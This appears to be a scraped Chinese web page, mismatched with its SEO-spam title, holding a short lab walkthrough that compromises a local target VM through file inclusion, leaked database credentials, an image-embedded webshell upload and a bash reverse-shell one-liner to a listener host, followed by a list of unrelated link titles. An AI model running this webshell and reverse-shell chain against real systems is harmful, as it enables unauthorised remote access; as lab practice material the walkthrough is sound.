当前位置: 首页 > wzjs >正文

天长街道两学一做网站seo搜索

wzjs 2025/8/29 6:01:33
天长街道两学一做网站,seo搜索,网站建设相关岗位名称,做ppt哪个网站的图片好1.安装并开启靶机 2.获取靶机IP 3.浏览器访问靶机 4.获取敏感目录 5.访问目录 http://192.168.40.143/in 可能存在文件包含漏洞 http://192.168.40.143/add 尝试上传无反应 http://192.168.40.143/test 尝试文件包含 尝试改用POST传参&a…

1.安装并开启靶机

2.获取靶机IP 

3.浏览器访问靶机 

4.获取敏感目录 

5.访问目录

http://192.168.40.143/in            可能存在文件包含漏洞

http://192.168.40.143/add           尝试上传无反应

http://192.168.40.143/test             尝试文件包含

尝试改用POST传参,包含成功

查看c.php,发现了疑似数据库用户名密码及库名 

http://192.168.40.143/phpmy/                尝试登录数据库,登陆成功

 发现用户名密码,尝试登录最初页面,登陆成功

发现文件上传节点

6.制作图片马并上传

新建2.asp写入一句话木马 

打开cmd,切换到 1.jpg 和 2.asp 文件目录下,制作图片马 

上传成功

点击continue,用BP抓包

 

7.反弹shell 

echo "bash -i >& /dev/tcp/192.168.40.133/8888 0>&1" | bash

进行url编码,同时打开Kali监听

将转码复制在 cmd= 后,反弹 shell 

反弹shell成功 

http://www.dtcms.com/wzjs/528450.html

相关文章:

  • 昆明网站做的好的公司简介大众网疫情最新消息
  • 传奇网游排名上海百度搜索优化
  • 城镇建设部网站百度站长工具如何使用
  • 图书网站开发的实践意义宁波seo关键词优化方法
  • 移动端网站怎么制作基础建站如何提升和优化
  • 网站框架图百度推广客服人工电话多少
  • 杭州维利国德网站建设案例计算机基础培训机构
  • 网站建设公司自贡重庆百度seo公司
  • 1000学习做网站贵吗大数据统计网站
  • 网站建设发展历程ppt学校教育培训机构
  • 官方网站下载手电筒网页代码大全
  • 重庆网站建站建设的费用线上培训平台
  • 网站编辑心得体会电商网页
  • 做电影网站解析某产品网络营销推广方案
  • 香港机房 经营性网站代发百度关键词排名
  • 哈尔滨网站空间网站运营需要多少钱
  • 云平台网站建设网推是干什么的
  • 注册过什么网站百度关键词搜索量排行
  • vs2012 网站开发如何查询域名注册人信息
  • 沈阳网站备案查询青岛网站
  • 网站建设微信营销公司怎样做网站推广
  • wordpress重置密码云南seo简单整站优化
  • 江山做网站阳江网站建设
  • 衡阳做网站优化南京seo排名优化公司
  • 做灯箱片的设计网站百度蜘蛛池自动收录seo
  • 嘉兴 网站 制作seo点击软件排名优化
  • 佛山的网站建设公司做百度推广的网络公司广州
  • 一个做礼品的网站外贸网站建设设计方案
  • 广南网站建设培训班招生方案有哪些
  • oss cdn wordpress网站优化推广培训